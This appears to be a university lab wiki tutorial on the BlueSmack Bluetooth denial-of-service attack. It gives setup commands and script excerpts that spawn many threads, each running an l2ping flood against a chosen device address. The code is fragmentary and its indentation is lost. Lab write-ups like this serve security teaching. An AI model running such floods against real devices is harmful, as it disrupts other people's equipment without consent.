Bluetooth BlueSmack Attack

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search


BlueSmack is a Bluetooth-based Denial-of-Service (DoS) attack, in which the victim device is flooded with a high volume of oversized or malformed echo packets with the intent of causing it to crash or become unresponsive.


  • A Bluetooth-enabled Linux computer to perform the attack
  • A susceptible Bluetooth device
  • A Bluetooth-enabled device to monitor if the attack worked

For the execution of this attack, a Kali Linux VM, a JBL GO Speaker, and an Android Smartphone were used.


Step 1 - Installing Prerequisites

Make sure Python is installed:

sudo apt update
sudo apt install python3

You must have "l2ping" and "hcitool" installed. They are installed by default on Kali Linux. Both are part of the bluez package, so if you are not using Kali, run the following command:

sudo apt install bluez

Step 2 - Activate your Bluetooth Interface

”hciconfig -a” shows information about your Bluetooth interface. Here its address and identifier can be found. The identifier is needed for the second command, which will turn the interface up. This is probably either hci0 or hci1.

hciconfig -a

This command activates the Bluetooth interface:

sudo hciconfig hci0 up

Step 3 - The DOS attack

The attack script can be cloned using the command below.

sudo git clone

To perform the attack, you have to go to the directory the script was saved to and execute the py file:


When executed, the script will perform an hcitool scan to look for nearby devices and list their addresses. This is to make the next step easier.

The script will ask for three inputs:

  • The victim device address
  • The size of the packages sent
  • The thread count

The first parameter can be taken from the scan the script automatically performs when executed. The package size can be set in bytes, for this attacks a size of 600 was used. The thread count decides how many threads are created to attack concurrently. For this attack, 100 were used.

After entering all three parameters, the threads are set up and then the attack is performed.

You can now use a device like a smartphone to check if the attack is working by trying to connect to the victim device. If the attack worked as it should, you are not able to connect to the device anymore.

How it works

The user is prompted for the target device ID or address:

target_id = input(’Target id or mac > ’)
target_addr = array[int(target_id)]
target_addr = target_id
if len(target_addr) < 1:
print(’[!] ERROR: Target addr is missing’)

The user is prompted for the package size that will be sent to the target:

package_size = int(input(’Package size > ’))
print(’[!] ERROR: Package size must be an integer’)

The user is prompted for the thread count:

thread_count = int(input(’Thread count > ’))
print(’[!] ERROR: Thread count must be an integer’)

The number of threads the user input defines is created:

#Create and start multiple threads for the DOS attack
for i in range(0, thread_count):
print(’[*] Built thread №’ + str(i + 1))
threading.Thread(target=DOS, args=[str(target_addr), str(package_size)]).start()

L2ping is used here for flooding the target with packets. The primary purpose of l2ping is to test the connection and latency between two Bluetooth devices. It sends Bluetooth packets to a device and measures the time it takes for the packets to travel to the remote device and back. In the script, the DOS function uses l2ping to perform a Bluetooth DOS attack. The -s option is used to set the size of the ping packets, and the target address is specified as one of the parameters.

#Function for performing the DOS attack using l2ping
def DOS(target_addr, package_size):
os.system(’l2ping -i hci0 -s ’ + str(package_size) + ’ -f ’ + target_addr)